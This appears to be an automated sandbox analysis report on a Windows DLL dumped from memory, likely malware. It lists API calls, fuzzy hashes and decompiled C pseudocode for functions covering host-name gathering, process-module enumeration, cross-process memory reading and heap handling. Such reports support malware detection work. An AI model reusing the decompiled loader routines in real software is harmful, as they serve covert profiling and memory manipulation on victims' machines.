API ID: ExitThreadlstrlen
String ID:
API String ID: 2636182767-0
Opcode ID: c4a66a820d235b6e490981c3b586c7234e049097e0bd8924d2cc297edb04c7af
Instruction ID: 078751e4f40428113d1b3f4477417d8672a818837d546f9aae3a4056d651ab87
Opcode Fuzzy Hash: c4a66a820d235b6e490981c3b586c7234e049097e0bd8924d2cc297edb04c7af
Instruction Fuzzy Hash: 8511D0BA2087059EDB01CBFCC908FBF77ECAB16304F014815E251D3150EB30E98AAB52

Uniqueness

Uniqueness Score: -1.00%

Function 00B6FE73, Relevance: 3.1, APIs: 2, Instructions: 57COMMON

Download Yara Rule

APIs

Part of subcall function 00B55E9A: RtlAllocateHeap.NTDLL(00000000,00000001,00B6295C), ref: 00B55EA6

EnumProcessModules.PSAPI(00000008,00000000,00001000,00000000,00001000,00B807F0,-0000000C,00000000,00000000), ref: 00B6FEA3
GetLastError.KERNEL32(00000008,00000000,00001000,00000000,00001000,00B807F0,-0000000C,00000000), ref: 00B6FEEA

Part of subcall function 00B70757: RtlFreeHeap.NTDLL(00000000,00000000,00B629D3,00000000), ref: 00B70763

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: Heap$AllocateEnumErrorFreeLastModulesProcess
String ID:
API String ID: 552344955-0
Opcode ID: ffc61cb92d5ed81e47be859d088f63f1ab0b40a2fc374329aed6ca08266f0ed9
Instruction ID: a218b58006a1b95c46855a5d960f369f8f12152a55bf26790c5eebb30c47fcb4
Opcode Fuzzy Hash: ffc61cb92d5ed81e47be859d088f63f1ab0b40a2fc374329aed6ca08266f0ed9
Instruction Fuzzy Hash: C411E571900209FBC711DFA8D895BAEBBF8EF80751F2084E9E41497251DB7ACE45CB10

Uniqueness

Uniqueness Score: -1.00%

Function 00B6AF63, Relevance: 3.1, APIs: 2, Instructions: 54memorytimeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,00B667E4,69B25F44,?,?,00000000), ref: 00B6AFA0
HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,00B667E4), ref: 00B6B001

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: Time$FileFreeHeapSystem
String ID:
API String ID: 892271797-0
Opcode ID: 455cfef0f34c16abb680f5f1be1f1de69409b08d5a6043acc6432a379de9f10f
Instruction ID: 0aae008bfbc1a3252f562d5f8395c1632d6c6989d50801249ba3a3b20b19f6b2
Opcode Fuzzy Hash: 455cfef0f34c16abb680f5f1be1f1de69409b08d5a6043acc6432a379de9f10f
Instruction Fuzzy Hash: 9E11E3B5901208EACF10EBA4DD45E9EB7FCEB08345F0045A2A915E3161DB789B85DB62

Uniqueness

Uniqueness Score: -1.00%

Function 00B0164F, Relevance: 3.1, APIs: 2, Instructions: 52COMMON

Download Yara Rule

APIs

SafeArrayCreate.OLEAUT32(00000011,00000001,80000002), ref: 00B01676

Part of subcall function 00B0144D: SysFreeString.OLEAUT32(?), ref: 00B0152C

SafeArrayDestroy.OLEAUT32(?), ref: 00B016C6

Memory Dump Source

Source File: 00000000.00000002.820669375.0000000000B01000.00000020.00020000.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000000.00000002.820637084.0000000000B00000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820763060.0000000000B0C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.820819562.0000000000B0D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820852488.0000000000B0F000.00000002.00020000.sdmp Download File

Similarity

API ID: ArraySafe$CreateDestroyFreeString
String ID:
API String ID: 3098518882-0
Opcode ID: 021b343064ed407468bfc0e85eacf2586fce35779743479fdae7e33d575a3341
Instruction ID: ebdaedcefdb0fb8391c03ee323feb8f014d0c7346eaf7265cc3b07541e6ce664
Opcode Fuzzy Hash: 021b343064ed407468bfc0e85eacf2586fce35779743479fdae7e33d575a3341
Instruction Fuzzy Hash: 2E113C32A00109BFDB019FA8CC05AAEBBB9EF18350F008455FA04E71A1E771DA15DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00B058AE, Relevance: 3.0, APIs: 2, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(00B0258B), ref: 00B058C7

Part of subcall function 00B0144D: SysFreeString.OLEAUT32(?), ref: 00B0152C

SysFreeString.OLEAUT32(00000000), ref: 00B05908

Memory Dump Source

Source File: 00000000.00000002.820669375.0000000000B01000.00000020.00020000.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000000.00000002.820637084.0000000000B00000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820763060.0000000000B0C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.820819562.0000000000B0D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820852488.0000000000B0F000.00000002.00020000.sdmp Download File

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
Opcode ID: 0af2945ea32ab1d70296513a1246264937c8e02de4d76b288a76a5fc20060aaf
Instruction ID: 1c324a46c34d8eb43b3ae921fe6b166ba360c34cc8c8f18ae26f9c5e8a930896
Opcode Fuzzy Hash: 0af2945ea32ab1d70296513a1246264937c8e02de4d76b288a76a5fc20060aaf
Instruction Fuzzy Hash: CB01283651011ABFDB019FA8D8048ABBFB8EF48350B014562EA09E7160E7309A15DBA6

Uniqueness

Uniqueness Score: -1.00%

Function 00B04B28, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B04B28(intOrPtr* __edi, void* _a4, void* _a8, unsigned int _a12) {
				void* _t21;
				void* _t22;
				signed int _t24;
				intOrPtr* _t26;
				void* _t27;

				_t26 = __edi;
				if(_a4 == 0) {
					L2:
					_t27 = E00B063F5(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
					if(_t27 == 0) {
						_t24 = _a12 >> 1;
						if(_t24 == 0) {
							_t27 = 2;
							HeapFree( *0xb0d270, 0, _a4);
						} else {
							_t21 = _a4;
							 *((short*)(_t21 + _t24 * 2 - 2)) = 0;
							 *_t26 = _t21;
						}
					}
					L6:
					return _t27;
				}
				_t22 = E00B01E47(_a4, _a8, _a12, __edi); // executed
				_t27 = _t22;
				if(_t27 == 0) {
					goto L6;
				}
				goto L2;
			}

0x00b04b28
0x00b04b30
0x00b04b47
0x00b04b62
0x00b04b66
0x00b04b6b
0x00b04b6d
0x00b04b7f
0x00b04b8b
0x00b04b6f
0x00b04b6f
0x00b04b74
0x00b04b79
0x00b04b79
0x00b04b6d
0x00b04b91
0x00b04b95
0x00b04b95
0x00b04b3c
0x00b04b41
0x00b04b45
0x00000000
0x00000000
0x00000000

APIs

Part of subcall function 00B01E47: SysFreeString.OLEAUT32(00000000), ref: 00B01EAA

HeapFree.KERNEL32(00000000,00000000,00000000,80000002,74E5F710,?,00000000,?,00000000,?,00B0506B,?,004F0053,018D9370,00000000,?), ref: 00B04B8B

Strings

Ut, xrefs: 00B04B8B

Memory Dump Source

Source File: 00000000.00000002.820669375.0000000000B01000.00000020.00020000.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000000.00000002.820637084.0000000000B00000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820763060.0000000000B0C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.820819562.0000000000B0D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820852488.0000000000B0F000.00000002.00020000.sdmp Download File

Similarity

API ID: Free$HeapString
String ID: Ut
API String ID: 3806048269-8415677
Opcode ID: bf8f833db6cd83218593b068b0a11e47e2fa13eedba36400a78613865c9e5c31
Instruction ID: 07f8da8cd76df49a59c717b05f1b53dd6eedf9fc8db9168711cd8de126d1d845
Opcode Fuzzy Hash: bf8f833db6cd83218593b068b0a11e47e2fa13eedba36400a78613865c9e5c31
Instruction Fuzzy Hash: B001FB7250061ABBDF229F58CC41FEE7FA5EF54790F048465FE099A1A0DB31D960EB90

Uniqueness

Uniqueness Score: -1.00%

Function 00B01BBF, Relevance: 3.0, APIs: 2, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00B01BBF(void* __ecx) {
				signed int _v8;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t22;
				intOrPtr* _t23;

				_t23 = __imp__;
				_t20 = 0;
				_v8 = _v8 & 0;
				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
				_t10 = _v8;
				if(_v8 != 0) {
					_t20 = E00B075F6(_t10 + 1);
					if(_t20 != 0) {
						_t15 =  *_t23(3, _t20,  &_v8); // executed
						if(_t15 != 0) {
							 *((char*)(_v8 + _t20)) = 0;
						} else {
							E00B04AAB(_t20);
							_t20 = 0;
						}
					}
				}
				return _t20;
			}

0x00b01bc4
0x00b01bcf
0x00b01bd1
0x00b01bd7
0x00b01bd9
0x00b01bde
0x00b01be7
0x00b01beb
0x00b01bf4
0x00b01bf8
0x00b01c07
0x00b01bfa
0x00b01bfb
0x00b01c00
0x00b01c00
0x00b01bf8
0x00b01beb
0x00b01c10

APIs

GetComputerNameExA.KERNELBASE(00000003,00000000,00B04531,74E5F710,00000000,?,?,00B04531), ref: 00B01BD7

Part of subcall function 00B075F6: RtlAllocateHeap.NTDLL(00000000,00000000,00B04F70), ref: 00B07602

GetComputerNameExA.KERNELBASE(00000003,00000000,00B04531,00B04532,?,?,00B04531), ref: 00B01BF4

Part of subcall function 00B04AAB: RtlFreeHeap.NTDLL(00000000,00000000,00B05012,00000000,?,?,00000000), ref: 00B04AB7

Memory Dump Source

Source File: 00000000.00000002.820669375.0000000000B01000.00000020.00020000.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000000.00000002.820637084.0000000000B00000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820763060.0000000000B0C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.820819562.0000000000B0D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820852488.0000000000B0F000.00000002.00020000.sdmp Download File

Similarity

API ID: ComputerHeapName$AllocateFree
String ID:
API String ID: 187446995-0
Opcode ID: 7139b4609aabce1384de90cc44ba527a99c86ee75cdf93cd131f3b3262da2245
Instruction ID: bc5deef09c613f29d39211a518c3cbf758d2fefb3c52b9a86cc3c01f50ebcf58
Opcode Fuzzy Hash: 7139b4609aabce1384de90cc44ba527a99c86ee75cdf93cd131f3b3262da2245
Instruction Fuzzy Hash: CEF03066640105AAEB21D6998D41FAB6EFCDBC5751F110095AA05D7181EA70DE019670

Uniqueness

Uniqueness Score: -1.00%

Function 00B065EA, Relevance: 3.0, APIs: 2, Instructions: 35
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B065EA(WCHAR* _a4) {
				void* __edi;
				intOrPtr _t11;
				intOrPtr _t14;
				void* _t16;
				void* _t18;
				WCHAR* _t20;

				_t20 = E00B075F6(lstrlenW(_a4) + _t7 + 0x5c);
				if(_t20 == 0) {
					_t18 = 8;
				} else {
					_t11 =  *0xb0d2e0; // 0xdca5a8
					_t5 = _t11 + 0xb0ea50; // 0x43002f
					wsprintfW(_t20, _t5, 5, _a4);
					_t14 =  *0xb0d2e0; // 0xdca5a8
					_t6 = _t14 + 0xb0e8fc; // 0x6d0063
					_t16 = E00B05AB2(0, _t6, _t20, 0); // executed
					_t18 = _t16;
					E00B04AAB(_t20);
				}
				return _t18;
			}

0x00b06600
0x00b06604
0x00b06644
0x00b06606
0x00b0660a
0x00b06611
0x00b06619
0x00b0661f
0x00b0662a
0x00b06633
0x00b06639
0x00b0663b
0x00b0663b
0x00b06649

APIs

lstrlenW.KERNEL32(74E5F710,00000000,00000001,00B021D5,00000005,?,74E5F710,00000000,74E5F730,?,?,?,00B0555B,?,00000001,?), ref: 00B065F0

Part of subcall function 00B075F6: RtlAllocateHeap.NTDLL(00000000,00000000,00B04F70), ref: 00B07602

wsprintfW.USER32 ref: 00B06619

Part of subcall function 00B05AB2: memset.NTDLL ref: 00B05AD5
Part of subcall function 00B05AB2: GetLastError.KERNEL32 ref: 00B05B21

Part of subcall function 00B04AAB: RtlFreeHeap.NTDLL(00000000,00000000,00B05012,00000000,?,?,00000000), ref: 00B04AB7

Memory Dump Source

Source File: 00000000.00000002.820669375.0000000000B01000.00000020.00020000.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000000.00000002.820637084.0000000000B00000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820763060.0000000000B0C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.820819562.0000000000B0D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820852488.0000000000B0F000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$AllocateErrorFreeLastlstrlenmemsetwsprintf
String ID:
API String ID: 1672627171-0
Opcode ID: ae6f3847bf8d392cbf570354e351ec30617668a914d01dd213b65c3eb931b732
Instruction ID: 65009001d0c1fa7848d791d5fa8217f7e080b81dd0f020ddf66ab51501760540
Opcode Fuzzy Hash: ae6f3847bf8d392cbf570354e351ec30617668a914d01dd213b65c3eb931b732
Instruction Fuzzy Hash: D1F0E272601610AFD3109B98DC49FAB7BDCEF94310F0684A6FA01D71A2DF30D911CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00B018D8, Relevance: 3.0, APIs: 2, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t4;
				void* _t10;
				void* _t11;
				void* _t12;
				void* _t14;

				_t14 = 1;
				_t4 = _a8;
				if(_t4 == 0) {
					if(InterlockedDecrement(0xb0d274) == 0) {
						E00B04450();
					}
				} else {
					if(_t4 == 1 && InterlockedIncrement(0xb0d274) == 1) {
						_t10 = E00B0262F(_t11, _t12, _a4); // executed
						if(_t10 != 0) {
							_t14 = 0;
						}
					}
				}
				return _t14;
			}

0x00b018df
0x00b018e0
0x00b018e3
0x00b01915
0x00b01917
0x00b01917
0x00b018e5
0x00b018e6
0x00b018fb
0x00b01902
0x00b01904
0x00b01904
0x00b01902
0x00b018e6
0x00b0191f

APIs

InterlockedIncrement.KERNEL32(00B0D274), ref: 00B018ED

Part of subcall function 00B0262F: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,00B01900,?), ref: 00B02642

InterlockedDecrement.KERNEL32(00B0D274), ref: 00B0190D

Memory Dump Source

Source File: 00000000.00000002.820669375.0000000000B01000.00000020.00020000.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000000.00000002.820637084.0000000000B00000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820763060.0000000000B0C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.820819562.0000000000B0D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820852488.0000000000B0F000.00000002.00020000.sdmp Download File

Similarity

API ID: Interlocked$CreateDecrementHeapIncrement
String ID:
API String ID: 3834848776-0
Opcode ID: 96b5dc6391998887367a66c6650041e375af0f35cc6a9dd215416b0cd048b977
Instruction ID: 376d7b372c58757052d75a8bb459a905ba8d4f202ef00872e8c3bddd00f9f1f1
Opcode Fuzzy Hash: 96b5dc6391998887367a66c6650041e375af0f35cc6a9dd215416b0cd048b977
Instruction Fuzzy Hash: ADE04F3938412297CB393BA89C1875BAED0EB20780F418A94B484D20F6DB10CD83C691

Uniqueness

Uniqueness Score: -1.00%

Function 00B6D50D, Relevance: 2.6, APIs: 2, Instructions: 70memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B5D814: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 00B5D84D
Part of subcall function 00B5D814: VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,?,?), ref: 00B5D883
Part of subcall function 00B5D814: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00B5D88F
Part of subcall function 00B5D814: lstrcmpi.KERNEL32(?,00000000), ref: 00B5D8CC
Part of subcall function 00B5D814: StrChrA.SHLWAPI(?,0000002E), ref: 00B5D8D5
Part of subcall function 00B5D814: lstrcmpi.KERNEL32(?,00000000), ref: 00B5D8E7
Part of subcall function 00B5D814: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00B5D938

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,00000010,?,?,?,00B7D5C0,0000002C,00B6DBFC,04348E36,?,00000000,00B54AC6), ref: 00B6D54C

Part of subcall function 00B6D103: GetProcAddress.KERNEL32(?,00000000), ref: 00B6D12C
Part of subcall function 00B6D103: NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,00B64659,00000000,00000000,00000028,00000100), ref: 00B6D14E

VirtualFree.KERNELBASE(?,00000000,00008000,00000010,?,?,?,00B7D5C0,0000002C,00B6DBFC,04348E36,?,00000000,00B54AC6,?,00000318), ref: 00B6D5D7

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: Virtual$AllocFree$lstrcmpi$AddressMemory64ProcReadWow64
String ID:
API String ID: 4138075514-0
Opcode ID: e6c7e6211b96e97d8178fa3b2120a96cf6915358dbc086afaf4e41d5601778b2
Instruction ID: 675e5eacbb282d1dbe3f918c6141c49188101b0954819ffeb4a300ccbfa6f617
Opcode Fuzzy Hash: e6c7e6211b96e97d8178fa3b2120a96cf6915358dbc086afaf4e41d5601778b2
Instruction Fuzzy Hash: B121E671E01228ABCF11DFA5DC84ADEBBB4FF08724F10816AF918B6250C7344A418FA4

Uniqueness

Uniqueness Score: -1.00%

Function 00B62A1E, Relevance: 1.6, APIs: 1, Instructions: 99COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,00000001,00000000,74E04D40,?,?,00000000,00B667D3,?,?,?,?,?,?,?,00B577C7), ref: 00B62A33

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 025512f3e3fde30b3ada080c5ebccfb6ab8f79741f559a49c81e2c3fade188e5
Instruction ID: 8d58f6b9d307365ce984e6e47f01b94cd00e238d9222e32931b851f8f1cb1c40
Opcode Fuzzy Hash: 025512f3e3fde30b3ada080c5ebccfb6ab8f79741f559a49c81e2c3fade188e5
Instruction Fuzzy Hash: 8E318376A00605EFDB10EFD8D885EADB7F9FB44360B1484E9E205AB221C774AE46CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00B034F6, Relevance: 1.6, APIs: 1, Instructions: 75
memoryCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E00B034F6(signed int __eax, void* __ecx, intOrPtr* _a4, void** _a8, intOrPtr* _a12) {
				signed int _v5;
				signed int _v12;
				void* _t32;
				signed int _t37;
				signed int _t39;
				signed char _t45;
				void* _t49;
				char* _t51;
				signed int _t65;
				signed int _t66;
				signed int _t69;

				_v12 = _v12 & 0x00000000;
				_t69 = __eax;
				_t32 = RtlAllocateHeap( *0xb0d270, 0, __eax << 2); // executed
				_t49 = _t32;
				if(_t49 == 0) {
					_v12 = 8;
				} else {
					 *_a8 = _t49;
					do {
						_t45 =  *_a4;
						asm("cdq");
						_t65 = 0x64;
						_t37 = (_t45 & 0x000000ff) / _t65;
						_v5 = _t37;
						if(_t37 != 0) {
							 *_t49 = _t37 + 0x30;
							_t49 = _t49 + 1;
							_t45 = _t45 + _t37 * 0x9c;
						}
						asm("cdq");
						_t66 = 0xa;
						_t39 = (_t45 & 0x000000ff) / _t66;
						if(_t39 != 0 || _v5 != _t39) {
							 *_t49 = _t39 + 0x30;
							_t49 = _t49 + 1;
							_t45 = _t45 + _t39 * 0xf6;
						}
						_a4 = _a4 + 1;
						 *_t49 = _t45 + 0x30;
						 *(_t49 + 1) = 0x2c;
						_t49 = _t49 + 2;
						_t69 = _t69 - 1;
					} while (_t69 != 0);
					_t51 = _t49 - 1;
					 *_a12 = _t51 -  *_a8;
					 *_t51 = 0;
				}
				return _v12;
			}

0x00b034fb
0x00b03500
0x00b0350e
0x00b03514
0x00b03518
0x00b03589
0x00b0351a
0x00b0351e
0x00b03521
0x00b03524
0x00b0352b
0x00b0352c
0x00b0352d
0x00b0352f
0x00b03534
0x00b0353b
0x00b03541
0x00b03542
0x00b03542
0x00b03549
0x00b0354a
0x00b0354b
0x00b0354f
0x00b0355b
0x00b03561
0x00b03562
0x00b03562
0x00b03564
0x00b0356a
0x00b0356c
0x00b03571
0x00b03572
0x00b03572
0x00b03578
0x00b03581
0x00b03583
0x00b03586
0x00b03595

APIs

RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 00B0350E

Memory Dump Source

Source File: 00000000.00000002.820669375.0000000000B01000.00000020.00020000.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000000.00000002.820637084.0000000000B00000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820763060.0000000000B0C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.820819562.0000000000B0D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820852488.0000000000B0F000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 67eeefe42c1526241eb7b03a7e33f75539897ebfc3693734a5597da69977bf82
Instruction ID: 5fd3d93981146e33f43db864b61cc008b92f3b52d1a96a08666dc43a0f4f4137
Opcode Fuzzy Hash: 67eeefe42c1526241eb7b03a7e33f75539897ebfc3693734a5597da69977bf82
Instruction Fuzzy Hash: D011E7712453409FEB058F29D855BE97FE9DB23718F14408AE4408B2E2C276CA0BC760

Uniqueness

Uniqueness Score: -1.00%

Function 00B68CCB, Relevance: 1.6, APIs: 1, Instructions: 74COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00B6A536,00B807F0,-0000000C,00000000,?,?,00B6A538,0000000C,00000000,?), ref: 00B68D06

Part of subcall function 00B6F02A: NtQueryInformationProcess.NTDLL(00000000,00000402,00000018,00000000,00B81460), ref: 00B6F041

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: HandleInformationModuleProcessQuery
String ID:
API String ID: 2776635927-0
Opcode ID: d22bfe441e51e95273cee088dc7f92d32f92992d8c842a4b2bc4fc2059a1870a
Instruction ID: 59ad157782a40d001aeaea8349f1a0eebb637dc4f1af1cdf71e8ae4ba760a924
Opcode Fuzzy Hash: d22bfe441e51e95273cee088dc7f92d32f92992d8c842a4b2bc4fc2059a1870a
Instruction Fuzzy Hash: DD218131600208AFDB30CF59D980E6A77E9EF65790B1446BEE9499B190EF34EE40CB70

Uniqueness

Uniqueness Score: -1.00%

Function 00B01E47, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E00B01E47(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				char _v20;
				intOrPtr _t15;
				void* _t17;
				intOrPtr _t19;
				void* _t23;

				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0xb0d2e0; // 0xdca5a8
				_t4 = _t15 + 0xb0e39c; // 0x18d8944
				_t20 = _t4;
				_t6 = _t15 + 0xb0e124; // 0x650047
				_t17 = E00B0144D(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					_t23 = 8;
					if(_v20 != _t23) {
						_t23 = 1;
					} else {
						_t19 = E00B025D6(_t20, _v12);
						if(_t19 != 0) {
							 *_a16 = _t19;
							_t23 = 0;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}

0x00b01e51
0x00b01e58
0x00b01e59
0x00b01e5a
0x00b01e5b
0x00b01e61
0x00b01e66
0x00b01e66
0x00b01e70
0x00b01e82
0x00b01e89
0x00b01eb7
0x00b01e8b
0x00b01e8d
0x00b01e92
0x00b01eb4
0x00b01e94
0x00b01e97
0x00b01e9e
0x00b01ea3
0x00b01ea5
0x00b01ea5
0x00b01eaa
0x00b01eaa
0x00b01e92
0x00b01ebe

APIs

Part of subcall function 00B0144D: SysFreeString.OLEAUT32(?), ref: 00B0152C

Part of subcall function 00B025D6: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,00B0474F,004F0053,00000000,?), ref: 00B025DF
Part of subcall function 00B025D6: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,00B0474F,004F0053,00000000,?), ref: 00B02609
Part of subcall function 00B025D6: memset.NTDLL ref: 00B0261D

SysFreeString.OLEAUT32(00000000), ref: 00B01EAA

Memory Dump Source

Source File: 00000000.00000002.820669375.0000000000B01000.00000020.00020000.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000000.00000002.820637084.0000000000B00000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820763060.0000000000B0C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.820819562.0000000000B0D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820852488.0000000000B0F000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeString$lstrlenmemcpymemset
String ID:
API String ID: 397948122-0
Opcode ID: 226b6196680279fcb4f1da663928908ed58df5fd5f50906647c11aa5cab8d150
Instruction ID: 05d504de8bb8a87848db859ba2466b2a91153d3528692e8d46be5725116eead5
Opcode Fuzzy Hash: 226b6196680279fcb4f1da663928908ed58df5fd5f50906647c11aa5cab8d150
Instruction Fuzzy Hash: D9019A32900019BBDB169BA8DC409AFBFF8FB04350F0089A5EE01E31A1E770E921C791

Uniqueness

Uniqueness Score: -1.00%

Function 00B0AA93, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B0AA93() {

				E00B0ABF6(0xb0c2c4, 0xb0d0f0); // executed
				goto __eax;
			}

0x00b0aa4e
0x00b0aa55

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B0AA4E

Part of subcall function 00B0ABF6: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B0AC6F

Memory Dump Source

Source File: 00000000.00000002.820669375.0000000000B01000.00000020.00020000.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000000.00000002.820637084.0000000000B00000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820763060.0000000000B0C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.820819562.0000000000B0D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820852488.0000000000B0F000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: fdc65cb80e8c6b28faa8c161153401764bf2a926dbc9d744c85d8572ed313e45
Instruction ID: b76798639e6e564dcf46bcf5364f3e17438f6f0c9ae8eb36566d0ed82085bfee
Opcode Fuzzy Hash: fdc65cb80e8c6b28faa8c161153401764bf2a926dbc9d744c85d8572ed313e45
Instruction Fuzzy Hash: 5BB012833582016CF10472881DB2E370ECCD0C1B10330C9DAF804C05C2E8400C450033

Uniqueness

Uniqueness Score: -1.00%

Function 00B0AA89, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B0AA89() {

				E00B0ABF6(0xb0c2c4, 0xb0d0f4); // executed
				goto __eax;
			}

0x00b0aa4e
0x00b0aa55

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B0AA4E

Part of subcall function 00B0ABF6: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B0AC6F

Memory Dump Source

Source File: 00000000.00000002.820669375.0000000000B01000.00000020.00020000.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000000.00000002.820637084.0000000000B00000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820763060.0000000000B0C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.820819562.0000000000B0D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820852488.0000000000B0F000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 5599fddde7fa241525629a476c984cd998975659977be6d57a2d78b5bcc1a994
Instruction ID: d21ac1d96a36d7adc99f1ed70f0ed1bb5060d3ef8b403fc634fc79dbf2cecc47
Opcode Fuzzy Hash: 5599fddde7fa241525629a476c984cd998975659977be6d57a2d78b5bcc1a994
Instruction Fuzzy Hash: E3B012833582016CF10472881EB2C370ECCC0C1B10330C9DAFD04C05C1E8404C460033

Uniqueness

Uniqueness Score: -1.00%

Function 00B0AA3C, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B0AA3C() {

				E00B0ABF6(0xb0c2c4, 0xb0d110); // executed
				goto __eax;
			}

0x00b0aa4e
0x00b0aa55

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B0AA4E

Part of subcall function 00B0ABF6: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B0AC6F

Memory Dump Source

Source File: 00000000.00000002.820669375.0000000000B01000.00000020.00020000.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000000.00000002.820637084.0000000000B00000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820763060.0000000000B0C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.820819562.0000000000B0D000.00000004.00020000.sdmp Download File
